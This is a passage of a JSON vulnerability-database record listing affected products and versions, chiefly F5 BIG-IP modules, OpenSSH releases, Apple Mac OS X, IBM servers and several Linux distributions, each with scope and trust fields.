"trust": 0.3,
"vendor": "f5",
"version": "11.0"
},
{
"model": "big-iq device",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "4.2"
},
{
"model": "big-ip apm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.5.0"
},
{
"model": "big-ip asm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.4.1"
},
{
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "12.10"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "6.4"
},
{
"model": "big-ip asm hf7",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.1.0"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.8.1"
},
{
"model": "linux sparc",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "5.7"
},
{
"model": "big-ip edge gateway hf5",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"model": "communications policy management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "9.9.1"
},
{
"model": "big-ip apm hf1",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.1"
},
{
"model": "big-ip afm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.5"
},
{
"model": "idatplex dx360 m4 type",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "79120"
},
{
"model": "big-ip ltm hf2",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"model": "flex system compute node",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "x2407863"
},
{
"model": "big-ip psm hf1",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.1"
},
{
"model": "idatplex dx360 m4 water cooled type",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "79180"
},
{
"model": "big-ip edge gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2"
},
{
"model": "system m4",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "x35007383"
},
{
"model": "big-ip link controller",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"model": "business server",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "1"
},
{
"model": "5.2p1",
"scope": null,
"trust": 0.3,
"vendor": "openssh",
"version": null
},
{
"model": "flex system compute node",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "x2207906"
},
{
"model": "big-ip apm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.1"
},
{
"model": "big-ip apm hf2",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"model": "big-ip ltm hf1",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.1"
},
{
"model": "big-ip webaccelerator hf1",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.1"
},
{
"model": "big-ip ltm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.5.1"
},
{
"model": "big-ip webaccelerator",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.0"
},
{
"model": "big-ip analytics",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.1.0"
},
{
"model": "big-ip psm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.3"
},
{
"model": "idatplex dx360 m4 type",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "79130"
},
{
"model": "arx",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "6.0"
},
{
"model": "enterprise manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "2.1"
},
{
"model": "big-ip apm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.1"
},
{
"model": "big-ip gtm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.2"
},
{
"model": "big-ip asm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.40"
},
{
"model": "arx",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "6.4"
},
{
"model": "big-ip analytics",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"model": "big-ip edge gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.1"
},
{
"model": "big-ip gtm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.1.0"
},
{
"model": "big-ip ltm hf3",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"model": "big-ip analytics hf4",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.3.0"
},
{
"model": "big-ip link controller hf1",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.1"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.9.2"
},
{
"model": "system m4",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "x33007382"
},
{
"model": "big-ip link controller hf4",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.3.0"
},
{
"model": "arx",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "6.3"
},
{
"model": "mac os",
"scope": "ne",
"trust": 0.3,
"vendor": "apple",
"version": "x10.11"
},
{
"model": "big-ip asm hf1",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"model": "system type",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "x3850x638370"
},
{
"model": "big-ip ltm hf7",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.1.0"
},
{
"model": "enterprise linux desktop",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"model": "big-ip ltm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.4.1"
},
{
"model": "big-ip edge gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.4"
},
{
"model": "big-ip apm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.5.1"
},
{
"model": "big-ip wom",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.2"
},
{
"model": "big-ip ltm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.0"
},
{
"model": "arx",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "6.2"
},
{
"model": "big-ip wom",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.1.0"
},
{
"model": "big-ip gtm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2"
},
{
"model": "flex system manager node",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7955"
},
{
"model": "big-ip afm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.3"
},
{
"model": "enterprise manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "3.0"
},
{
"model": "nextscale nx360 m4 type",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "54550"
},
{
"model": "big-ip psm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"model": "big-ip aam",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.5.1"
},
{
"model": "big-ip gtm hf1",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.1"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.9.4"
},
{
"model": "linux ia-64",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"model": "enterprise linux",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.2"
},
{
"model": "big-ip pem",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.5"
},
{
"model": "big-ip ltm hf4",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.3.0"
},
{
"model": "big-ip edge gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.0"
},
{
"model": "big-ip analytics hf5",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.0"
},
{
"model": "flex system compute node",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "x2408738"
},
{
"model": "big-ip wom",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"model": "big-ip gtm hf2",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.10.3"
},
{
"model": "big-ip apm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.3.0"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.9.1"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.9"
},
{
"model": "enterprise linux workstation",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"model": "6.2p1",
"scope": null,
"trust": 0.3,
"vendor": "openssh",
"version": null
},
{
"model": "big-ip link controller hf2",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"model": "big-iq device",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "4.3"
},
{
"model": "big-ip edge gateway hf3",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.7.4"
},
{
"model": "big-ip apm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.4.1"
},
{
"model": "big-ip aam",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.4.0"
},
{
"model": "system m4 type",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "x365079150"
},
{
"model": "big-ip apm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.0"
},
{
"model": "big-ip wom hf4",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.3.0"
},
{
"model": "big-ip apm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.4"
},
{
"model": "big-ip ltm hf5",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.0"
},
{
"model": "big-ip aam",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.4.1"
},
{
"model": "big-ip webaccelerator",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.00"
},
{
"model": "big-ip gtm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.5"
},
{
"model": "system m4",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "x35507914"
},
{
"model": "big-ip asm hf3",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"model": "big-ip analytics",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.0.0"
},
{
"model": "big-ip psm hf4",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.3.0"
},
{
"model": "big-ip gtm hf3",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.0"
},
{
"model": "big-ip apm hf7",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.1.0"
},
{
"model": "big-ip edge gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.1"
},
{
"model": "big-ip psm hf5",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.0"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "5.8"
},
{
"model": "big-ip wom hf5",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.0"
},
{
"model": "big-ip apm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.0"
},
{
"model": "gpfs for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.5.0.11"
},
{
"model": "system m4 type",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "x357087330"
},
{
"model": "big-ip asm hf4",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.3.0"
},
{
"model": "communications policy management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "9.7.3"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "6.0"
},
{
"model": "big-ip webaccelerator",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"model": "big-ip link controller hf7",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.1.0"
},
{
"model": "big-ip link controller",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.00"
},
{
"model": "linux amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.10.2"
},
{
"model": "big-ip link controller",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.2"
},
{
"model": "big-ip edge gateway hf2",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"model": "big-ip edge gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.1"
},
{
"model": "flex system compute node",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "x2202585"
},
{
"model": "big-ip webaccelerator hf5",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.0"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "6.3"
},
{
"model": "6.2p2",
"scope": null,
"trust": 0.3,
"vendor": "openssh",
"version": null
},
{
"model": "big-ip afm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.4.1"
},
{
"model": "big-ip wom hf3",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.0"
},
{
"model": "linux mips",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"model": "linux lts",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "12.04"
},
{
"model": "big-ip link controller hf5",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.0"
},
{
"model": "hp-ux b.11.11",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"model": "big-ip edge gateway hf1",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.1"
},
{
"model": "virtual i/o server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2.3"
},
{
"model": "big-ip ltm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.2"
},
{
"model": "big-iq security",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "4.3"
},
{
"model": "big-ip ltm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.1.0"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "6.2"
},
{
"model": "big-ip psm hf2",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "slackware",
"version": "14.1"
},
{
"model": "flex system compute node",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "x2227916"
},
{
"model": "big-ip webaccelerator hf3",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"model": "aix",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1"
},
{
"model": "big-ip wom hf7",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.1.0"
},
{
"model": "big-ip analytics 11.0.0-hf2",
"scope": null,
"trust": 0.3,
"vendor": "f5",
"version": null
},
{
"model": "big-ip ltm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"model": "virtual i/o server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2.14"
},
{
"model": "big-ip afm hf4",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.3.0"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.8.2"
},
{
"model": "big-ip asm hf1",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.1"
},
{
"model": "big-ip gtm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.1"
},
{
"model": "big-ip analytics hf2",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.0"
},
{
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "slackware",
"version": "14.0"
},
{
"model": "big-ip analytics hf3",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"model": "enterprise linux hpc node optional",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"model": "hp-ux b.11.23",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"model": "big-ip pem",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.5.1"
},
{
"model": "big-ip edge gateway hf5",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.0"
},
{
"model": "flex system compute node",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "x8804259"
},
{
"model": "big-ip apm hf1",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "6.5"
},
{
"model": "system m4",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "x37508752"
},
{
"model": "big-ip analytics",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2"
},
{
"model": "big-ip psm hf1",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"model": "big-ip ltm hf3",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2"
},
{
"model": "business server",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "1x8664"
},
{
"model": "big-ip analytics",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.5.1"
},
{
"model": "aix",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.3"
},
{
"model": "big-ip apm hf3",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.0"
},
{
"model": "big-ip link controller",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.5"
},
{
"model": "system m4",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "x36307158"
},
{
"model": "big-ip apm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.10.1"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.8"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.8.4"
},
{
"model": "enterprise linux workstation optional",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"model": "big-ip asm hf5",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.0"
},
{
"model": "big-ip gtm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.5.1"
},
{
"model": "arx",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "6.1.1"
},
{
"model": "big-ip asm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.00"
},
{
"model": "5.6p1",
"scope": null,
"trust": 0.3,
"vendor": "openssh",
"version": null
},
{
"model": "bladecenter advanced management module 3.66g",
"scope": null,
"trust": 0.3,
"vendor": "ibm",
"version": null
},
{
"model": "big-ip psm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2"
},
{
"model": "big-ip link controller hf3",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"model": "big-ip ltm hf5",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"model": "big-iq cloud",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "4.0"
},
{
"model": "big-ip asm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.2"
},
{
"model": "big-ip asm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.1.0"
},
{
"model": "big-ip apm hf5",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "5.0"
},
{
"model": "flex system compute node",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "x2408737"
},
{
"model": "big-ip gtm hf5",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.0"
},
{
"model": "big-ip wom",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2"
},
{
"model": "big-ip apm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.4.0"
},
{
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "slackware",
"version": "13.37"
},
{
"model": "big-ip link controller hf1",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.9.3"
},
{
"model": "big-ip analytics",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.5"
},
{
"model": "enterprise linux",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6"
},
{
"model": "big-ip wom hf5",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"model": "big-ip asm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"model": "big-ip wom",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.5.1"
},
{
"model": "big-iq cloud",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "4.2"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.10.4"
},
{
"model": "big-ip asm hf2",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.00"
},
{
"model": "big-ip analytics hf1",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"model": "big-ip gtm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.4.1"
},
{
"model": "big-ip gtm hf7",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.1.0"
},
{
"model": "big-iq cloud",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "4.1"
},
{
"model": "big-ip webaccelerator hf5",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"model": "big-ip gtm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.0"
},
{
"model": "system m4",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "x32502583"
},
{
"model": "big-ip gtm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.4"
},
{
"model": "big-ip gtm hf1",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.7.3"
},
{
"model": "big-ip edge gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.3"
},
{
"model": "big-ip wom",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.3.0"
},
{
"model": "big-ip link controller hf5",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"model": "big-ip psm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.5"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.8.3"
},
{
"model": "hp-ux b.11.31",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"model": "linux s/390",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"model": "big-ip asm hf2",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"model": "big-ip link controller",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.1"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.7.1"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "5.4"
},
{
"model": "system m4",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "x31002582"
},
{
"model": "big-ip gtm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.0"
},
{
"model": "gpfs for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.5"
},
{
"model": "big-ip psm hf3",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.0"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "6.1"
},
{
"model": "virtual i/o server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2.1"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "5.1"
},
{
"model": "big-ip wom",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.4"
},
{
"model": "virtual i/o server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2.2.4"
},
{
"model": "p2",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "5.8"
},
{
"model": "big-ip pem",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.3"
},
{
"model": "big-ip edge gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.2"
},
{
"model": "big-ip webaccelerator",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.5.1"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.10.5"
},
{
"model": "big-ip apm hf4",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.3.0"
},
{
"model": "big-ip asm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.5"
},
{
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "13.10"
},
{
"model": "big-ip analytics hf2",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"model": "linux arm",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"model": "big-ip psm hf7",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.1.0"
},
{
"model": "big-ip wom",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.0"
},
{
"model": "big-ip asm hf3",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.0"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "5.2"
},
{
"model": "nsm3000 appliances",
"scope": "eq",
"trust": 0.3,
"vendor": "juniper",
"version": "2012.2"
},
{
"model": "enterprise linux server optional",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"model": "big-ip edge gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.10"
},
{
"model": "big-ip analytics",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.3"
},
{
"model": "nsmxpress appliances",
"scope": "eq",
"trust": 0.3,
"vendor": "juniper",
"version": "2012.2"
},
{
"model": "linux lts",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "10.04"
},
{
"model": "system m5 type",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "x310054570"
},
{
"model": "big-ip webaccelerator hf3",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2"
},
{
"model": "system m4",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "x35307160"
},
{
"model": "big-ip link controller",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.5.1"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.8"
},
{
"model": "big-ip webaccelerator",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.1"
},
{
"model": "big-ip ltm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2"
},
{
"model": "big-ip gtm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.3"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "5.3"
},
{
"model": "big-ip apm hf3",
"scope": "eq",
"trust": 0.3,
